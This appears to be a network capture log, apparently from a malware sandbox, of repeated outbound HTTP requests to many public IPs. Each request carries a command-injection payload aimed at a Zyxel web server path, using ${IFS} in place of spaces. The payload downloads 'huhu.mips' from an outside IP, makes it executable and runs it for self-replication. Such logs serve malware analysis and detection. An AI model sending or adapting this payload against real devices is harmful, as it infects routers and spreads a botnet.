                                              Jan 29, 2024 07:04:10.411534071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9423192.168.2.1459502142.254.117.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411550999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9424192.168.2.145527232.81.189.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411582947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9425192.168.2.1434400151.23.254.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411614895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9426192.168.2.144714099.240.252.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411648035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9427192.168.2.144404441.63.166.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411704063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9428192.168.2.1458160133.36.108.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411747932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9429192.168.2.144687024.246.36.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411792994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9430192.168.2.1434632143.116.68.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411833048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9431192.168.2.145683885.211.237.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411860943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9432192.168.2.1460948110.84.205.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411889076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9433192.168.2.1452494104.76.157.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411927938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9434192.168.2.1433738216.90.211.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411952972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9435192.168.2.145910254.225.186.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.411987066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9436192.168.2.143313492.43.180.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412050009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9437192.168.2.1452720170.81.110.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412077904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9438192.168.2.1447610171.238.62.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412138939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9439192.168.2.1442150143.255.143.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412159920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9440192.168.2.1455638136.193.78.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412193060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9441192.168.2.145677880.61.22.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412249088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9442192.168.2.1451258182.38.18.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412297010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9443192.168.2.143346087.191.135.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412331104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9444192.168.2.1456976110.128.226.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412368059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9445192.168.2.1459634168.118.173.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412410021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9446192.168.2.1458526163.200.195.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412451029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9447192.168.2.14604929.99.16.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412511110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9448192.168.2.1437052221.123.12.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412532091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9449192.168.2.144789477.6.137.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412575960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9450192.168.2.143777870.206.63.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412621975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9451192.168.2.144185269.52.50.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412677050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9452192.168.2.1456012171.249.203.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412727118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9453192.168.2.1446706182.32.71.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412759066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9454192.168.2.1451536165.225.107.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412827015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9455192.168.2.143544671.52.154.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412866116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9456192.168.2.143593678.135.17.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412892103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9457192.168.2.144847653.130.113.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412940025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9458192.168.2.1452308121.80.211.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.412991047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9459192.168.2.1459622174.68.100.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413031101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9460192.168.2.144526437.3.197.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413059950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9461192.168.2.145881625.11.164.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413106918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9462192.168.2.1443434108.84.178.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413141966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9463192.168.2.1443078115.111.225.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413187981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9464192.168.2.145194285.160.225.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413206100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9465192.168.2.1443372126.122.112.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413260937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9466192.168.2.143783054.182.16.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413292885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9467192.168.2.1454588198.218.236.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413345098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9468192.168.2.1438968138.67.73.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413378954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9469192.168.2.1436898169.45.240.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413417101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9470192.168.2.1455462124.18.148.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413444996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9471192.168.2.1442776164.10.215.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413491011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9472192.168.2.1448920174.10.75.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413533926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9473192.168.2.144483645.11.197.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413570881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9474192.168.2.1454974195.111.69.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413589001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9475192.168.2.1446734157.106.8.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413642883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9476192.168.2.14338981.100.62.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413670063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9477192.168.2.1449124103.230.65.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413726091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9478192.168.2.1437072126.109.107.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413755894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9479192.168.2.1457278107.110.237.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413789034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9480192.168.2.1459292132.173.196.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413821936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9481192.168.2.1438064148.14.1.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413844109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9482192.168.2.1454796122.212.145.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413878918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9483192.168.2.144468476.33.136.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413919926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9484192.168.2.1439260157.12.178.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.413981915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9485192.168.2.144218090.184.54.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.414027929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9486192.168.2.143443049.136.136.184443
                                              TimestampBytes transferredDirectionData
